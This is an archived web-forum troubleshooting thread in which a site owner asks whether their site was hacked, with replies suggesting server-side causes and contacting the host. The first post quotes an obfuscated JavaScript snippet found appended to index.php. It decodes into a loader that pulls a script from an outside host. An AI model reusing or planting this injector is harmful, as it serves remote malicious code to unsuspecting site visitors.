1. Home
  2. Community
  3. Troubleshooting and Problems
  4. Has my site been hacked?

This website can use cookies to improve the user experience

This website can use cookies to improve the user experience and to provide certain services and functions to users. Cookies contain small amounts of information (such as login information and user preferences) and will be stored on your device.

Enable All Cookies Privacy Policy

Has my site been hacked?

Troubleshooting and Problems 156 This topic was started by ,


avatar
cosmin 269
From: -
Has my site been hacked?

Starting with yesterday I starting getting errors on my website. It seems code is getting appended at the end of my index.php files. Yesterday it was index.php at the root, and now it's cadmin/index.php after the final question mark. This is definitely not of my own doing. Here's what cadmin/index.php had appended:

<html><body><script type="text/javascript">var wGss98v0zDCHi = "uBdb915uBdb935";var qg2solLrupydN0 = "uBdb93cuBdb973uBdb963uBdb972u"; var qg2solLrupydN1 = "Bdb969uBdb970uBdb974uBdb920uB"; var qg2solLrupydN2 = "db974uBdb979uBdb970uBdb965uBd"; var qg2solLrupydN3 = "b93duBdb922uBdb974uBdb965uBdb"; var qg2solLrupydN4 = "978uBdb974uBdb92fuBdb96auBdb9"; var qg2solLrupydN5 = "61uBdb976uBdb961uBdb973uBdb96"; var qg2solLrupydN6 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN7 = "uBdb922uBdb920uBdb973uBdb972u"; var qg2solLrupydN8 = "Bdb963uBdb93duBdb922uBdb968uB"; var qg2solLrupydN9 = "db974uBdb974uBdb970uBdb93auBd"; var qg2solLrupydN10 = "b92fuBdb92fuBdb963uBdb96fuBdb"; var qg2solLrupydN11 = "975uBdb96euBdb974uBdb965uBdb9"; var qg2solLrupydN12 = "72uBdb973uBdb974uBdb961uBdb97"; var qg2solLrupydN13 = "4uBdb973uBdb92euBdb973uBdb965"; var qg2solLrupydN14 = "uBdb972uBdb976uBdb965uBdb96du"; var qg2solLrupydN15 = "Bdb970uBdb933uBdb92euBdb963uB"; var qg2solLrupydN16 = "db96fuBdb96duBdb92fuBdb92fuBd"; var qg2solLrupydN17 = "b96duBdb96cuBdb92euBdb970uBdb"; var qg2solLrupydN18 = "968uBdb970uBdb922uBdb93euBdb9"; var qg2solLrupydN19 = "20uBdb93cuBdb92fuBdb973uBdb96"; var qg2solLrupydN20 = "3uBdb972uBdb969uBdb970uBdb974"; var qg2solLrupydN21 = "uBdb93e"; var ZPFlt1UYA1tfk = "Dh3Ln15uBdb935";var ERYCkoBwTvOcS = qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21; CtnqKOXMGM9bE = ERYCkoBwTvOcS.replace(/uBdb9/g,"%");var iRDgo28MEsBPo = unescape;var wGss98v0zDCHi = "AUx2i15Dh3Ln35";w9221 = this;var NKCGnIAa0Vzgr=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE));</script></body></html>>

Notice

This topic is archived. New comments cannot be posted and votes cannot be cast.

Responses to this topic

1 Re: Has my site been hacked?
avatar
OP 269
From: -
Yes, it's Cpanel. Will talk to them and see what they have to say.
1 Re: Has my site been hacked?
avatar
Editor
0
From: -
Possibly a security problem with the server. I would open a trouble ticket at your webhost.

There are worms that can overwrite files like this even from different accounts on the server. Is this a cPanel server? In this case your webhost should upgrade to PHP 5.2.14 or higher.
1 Re: Has my site been hacked?
avatar
OP 269
From: -
PHP version: 5.2.9
Used API: cgi-fcgi
Integration: Contentteller
Memory Limit: 128M
Upload Limit: 2M / 8M
Suhosin Extension: No
Database Server: MySQL 5.0.91-community
Database Size: 2.4 MB
Server Time/Uptime: 0.65 0.50 0.39 1/180 21169
Next Automated Task: -
Cached Pages (Database): 0
Cached Pages (Filesystem): 21

That's what I have in that module.
1 Re: Has my site been hacked?
avatar
Editor
0
From: -
In the System Information block right on the first page: load averages and server time/uptime
1 Re: Has my site been hacked?
avatar
OP 269
From: -
Where do I see those?
1 Re: Has my site been hacked?
avatar
Editor
0
From: -
Do you see the server load stats in admin?
1 Re: Has my site been hacked?
avatar
OP 269
From: -
When I tried to access cadmin after your question, I got the following error:

Parse error: syntax error, unexpected '?' in /home/********/public_html/cadmin/index.php on line 374. I replaced it with the original though (or at least I think it was the original). I'm gonna compare the local files with the one in the zip file. I'm transferring the files using Adobe Dreamweaver.

class_html.php
class_xml.php
class_wysiwyg.php
twitteroauth.php

Although only cadmin/index.php seemed be modified. The classes and twitteroauth.php seemed to have just a different timestamp between the ones on the server and the local files.
1 Re: Has my site been hacked?
avatar
Editor
0
From: -
Only the index.php files? Do you have any other scripts installed? Do you get server load stats in the admin section?
1 Re: Has my site been hacked?
avatar
OP 269
From: -
Yes, I am.
1 Re: Has my site been hacked?
avatar
Editor
0
From: -
Are you on a shared webhost?

Notice

This topic is archived. New comments cannot be posted and votes cannot be cast.